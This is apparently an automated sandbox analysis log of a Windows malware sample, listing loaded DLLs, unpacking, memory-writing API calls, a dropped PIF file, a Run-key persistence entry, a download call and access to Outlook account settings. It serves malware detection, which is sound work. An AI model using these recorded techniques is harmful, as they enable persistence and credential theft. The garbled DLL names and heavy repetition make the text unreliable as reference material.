                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???e???????????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???e???????????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?p.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?p?? .dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??i?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???2.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?????p?? .dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?????p??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?????p??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?????p??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??i.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ?p.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l?.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: HGTQP09643009.scr.exeStatic file information: File size 1103360 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbH source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeUnpacked PE file: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack
                    Source: Yara matchFile source: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02917CA8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029032FC push eax; ret 0_2_02903338
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291D204 push ecx; mov dword ptr [esp], edx0_2_0291D209
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290635A push 029063B7h; ret 0_2_029063AF
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290635C push 029063B7h; ret 0_2_029063AF
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02906730 push 02906772h; ret 0_2_0290676A
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290672E push 02906772h; ret 0_2_0290676A
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290C4E4 push ecx; mov dword ptr [esp], edx0_2_0290C4E9
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290D518 push 0290D544h; ret 0_2_0290D53C
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290CB64 push 0290CCEAh; ret 0_2_0290CCE2
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0290C892 push 0290CCEAh; ret 0_2_0290CCE2
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917884 push 02917901h; ret 0_2_029178F9
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029168BE push 0291696Bh; ret 0_2_02916963
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029168C0 push 0291696Bh; ret 0_2_02916963
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917ED0 push 02917F08h; ret 0_2_02917F00
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02912ED8 push 02912F4Eh; ret 0_2_02912F46
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02919E74 push 02919EACh; ret 0_2_02919EA4
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02912FE3 push 02913031h; ret 0_2_02913029
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02912FE4 push 02913031h; ret 0_2_02913029
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917C5C push 02917C9Eh; ret 0_2_02917C96
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02927DA0 push 02927F6Eh; ret 0_2_02927F66
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02915DF4 push ecx; mov dword ptr [esp], edx0_2_02915DF6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00457106 push ecx; ret 3_2_00457119
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0045B11A push esp; ret 3_2_0045B141
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0045E54D push esi; ret 3_2_0045E556
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00457A28 push eax; ret 3_2_00457A46
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00434E56 push ecx; ret 3_2_00434E69
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053AE41A push esi; ret 3_2_053AE423
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05351725 push edx; ret 3_2_05351743
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053A86F5 push eax; ret 3_2_053A8713
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053A7DD3 push ecx; ret 3_2_053A7DE6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053AAFE7 push esp; ret 3_2_053AB00E

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Jsqwmpul.PIFJump to dropped file
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00406EB0 ShellExecuteW,URLDownloadToFileW,3_2_00406EB0
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Jsqwmpul.PIFJump to dropped file
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AA4A
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JsqwmpulJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JsqwmpulJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02919EB0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02919EB0
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
